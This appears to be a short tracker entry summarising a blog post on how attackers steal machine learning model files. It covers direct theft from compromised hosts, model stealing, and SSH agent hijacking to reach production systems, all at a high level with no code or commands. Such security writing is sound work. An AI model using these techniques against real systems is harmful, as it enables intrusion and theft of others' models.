Machine Learning Attack Series: Stealing a model file
Summary
Attackers can steal machine learning model files through direct approaches like compromising systems to find model files (often with .h5 extensions), or through indirect approaches like model stealing where attackers build similar models themselves. One specific attack vector involves SSH agent hijacking (exploiting SSH keys stored in memory on compromised machines), which allows attackers to access production systems containing model files without needing the original passphrases.
Classification
Affected Vendors
Related Issues
Original source: https://embracethered.com/blog/posts/2020/husky-ai-machine-learning-model-stealing/
First tracked: February 12, 2026 at 02:20 PM
Classified by LLM (prompt v3) · confidence: 75%